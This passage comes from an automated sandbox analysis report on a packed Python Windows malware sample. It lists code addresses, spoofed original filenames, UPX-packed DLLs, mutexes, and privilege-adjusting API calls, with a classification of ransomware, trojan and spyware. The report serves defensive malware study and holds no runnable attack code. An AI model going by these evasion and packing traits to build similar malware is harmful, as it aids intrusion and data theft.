Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10FA55D 0_2_00007FF7B10FA55D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110842C 0_2_00007FF7B110842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110E5FC 0_2_00007FF7B110E5FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B111A5D8 0_2_00007FF7B111A5D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1102064 0_2_00007FF7B1102064
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1114860 0_2_00007FF7B1114860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1102884 0_2_00007FF7B1102884
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1111518 0_2_00007FF7B1111518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B11040C4 0_2_00007FF7B11040C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F90C0 0_2_00007FF7B10F90C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110F110 0_2_00007FF7B110F110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E7518268 2_2_00007FF8E7518268
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E754F81C 2_2_00007FF8E754F81C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E7545CE0 2_2_00007FF8E7545CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E7542FF0 2_2_00007FF8E7542FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E75453A0 2_2_00007FF8E75453A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E7541BB0 2_2_00007FF8E7541BB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF886B63027 9_2_00007FF886B63027
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DAE10 72_2_00007FF71D2DAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C0A2C 72_2_00007FF71D2C0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E7B24 72_2_00007FF71D2E7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BABA0 72_2_00007FF71D2BABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BB540 72_2_00007FF71D2BB540
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B1884 72_2_00007FF71D2B1884
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B82F0 72_2_00007FF71D2B82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C1180 72_2_00007FF71D2C1180
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C54C0 72_2_00007FF71D2C54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2FAE50 72_2_00007FF71D2FAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30FE74 72_2_00007FF71D30FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BCE84 72_2_00007FF71D2BCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C8E68 72_2_00007FF71D2C8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2FEEA4 72_2_00007FF71D2FEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2EAF0C 72_2_00007FF71D2EAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B9EFC 72_2_00007FF71D2B9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E0D20 72_2_00007FF71D2E0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F9D74 72_2_00007FF71D2F9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D301DCC 72_2_00007FF71D301DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BEE08 72_2_00007FF71D2BEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C1E04 72_2_00007FF71D2C1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E8040 72_2_00007FF71D2E8040
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C3030 72_2_00007FF71D2C3030
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E0074 72_2_00007FF71D2E0074
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DC05C 72_2_00007FF71D2DC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D3100F0 72_2_00007FF71D3100F0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D0104 72_2_00007FF71D2D0104
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E5F4C 72_2_00007FF71D2E5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D31AF90 72_2_00007FF71D31AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D31DFD8 72_2_00007FF71D31DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2EC00C 72_2_00007FF71D2EC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F4FE8 72_2_00007FF71D2F4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F5A70 72_2_00007FF71D2F5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2EFA6C 72_2_00007FF71D2EFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BCB14 72_2_00007FF71D2BCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D31AAC0 72_2_00007FF71D31AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2ED91C 72_2_00007FF71D2ED91C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DD97C 72_2_00007FF71D2DD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B49B8 72_2_00007FF71D2B49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F69FD 72_2_00007FF71D2F69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C8C30 72_2_00007FF71D2C8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F5C8C 72_2_00007FF71D2F5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D9D0C 72_2_00007FF71D2D9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D306D0C 72_2_00007FF71D306D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BDD04 72_2_00007FF71D2BDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F4B38 72_2_00007FF71D2F4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D309B98 72_2_00007FF71D309B98
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D307660 72_2_00007FF71D307660
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C86C4 72_2_00007FF71D2C86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2EA710 72_2_00007FF71D2EA710
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F0710 72_2_00007FF71D2F0710
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F2700 72_2_00007FF71D2F2700
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D3186D4 72_2_00007FF71D3186D4
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DF5B0 72_2_00007FF71D2DF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2EF59C 72_2_00007FF71D2EF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C8598 72_2_00007FF71D2C8598
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30260C 72_2_00007FF71D30260C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E65FC 72_2_00007FF71D2E65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C2890 72_2_00007FF71D2C2890
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B8884 72_2_00007FF71D2B8884
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D3018A8 72_2_00007FF71D3018A8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F190C 72_2_00007FF71D2F190C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E0904 72_2_00007FF71D2E0904
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E38E8 72_2_00007FF71D2E38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C17C8 72_2_00007FF71D2C17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D67E0 72_2_00007FF71D2D67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BF24C 72_2_00007FF71D2BF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D7244 72_2_00007FF71D2D7244
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2CE21C 72_2_00007FF71D2CE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D302268 72_2_00007FF71D302268
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2CD2C0 72_2_00007FF71D2CD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F02A4 72_2_00007FF71D2F02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D301314 72_2_00007FF71D301314
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2B42E0 72_2_00007FF71D2B42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F2164 72_2_00007FF71D2F2164
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F81CC 72_2_00007FF71D2F81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D3141CC 72_2_00007FF71D3141CC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F5468 72_2_00007FF71D2F5468
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DD458 72_2_00007FF71D2DD458
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2BA504 72_2_00007FF71D2BA504
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30832C 72_2_00007FF71D30832C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2E0374 72_2_00007FF71D2E0374
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2C2360 72_2_00007FF71D2C2360
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2DC3E0 72_2_00007FF71D2DC3E0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: String function: 00007FF71D2C8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: String function: 00007FF71D2F49F4 appears 53 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: String function: 00007FF8E751E4D8 appears 79 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: String function: 00007FF7B10F2B10 appears 47 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: String function: 00007FF8E751E338 appears 50 times
PE / OLE file has an invalid certificate
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: rar.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1330071281.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000000.1323604931.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324723670.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329798498.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325023146.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329595963.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324098275.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325594493.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325471563.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324638401.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324345518.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324470480.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324838344.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1327152682.00000162E1226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776316870.00007FF8F0D18000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772678970.00007FF8E738D000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773198829.00007FF8E7504000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776819964.00007FF8F585C000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770691400.00007FF8E6E27000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1768907588.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775764762.00007FF8F0953000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776987075.00007FF8F6DAC000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776611713.00007FF8F1E08000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771472421.00007FF8E729B000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772036219.00007FF8E7353000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777703826.00007FF8F9D77000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775141445.00007FF8E7BBB000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamepython311.dll. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773968980.00007FF8E75D2000.00000004.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: libcrypto-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9985088531464251
Source: libssl-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9920135147270115
Source: python311.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993315999451067
Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9977988591269841
Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9943153231216458
Source: R9FJX.zip.72.dr Binary or memory string: )x.sLnp4
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/56@2/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F8560 GetLastError,FormatMessageW,WideCharToMultiByte, 0_2_00007FF7B10F8560
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2CEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 72_2_00007FF71D2CEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 72_2_00007FF71D2FB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D3144 GetDiskFreeSpaceExW, 72_2_00007FF71D2D3144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8584:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Mutant created: \Sessions\1\BaseNamedObjects\z
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8380:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002 Jump to behavior
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
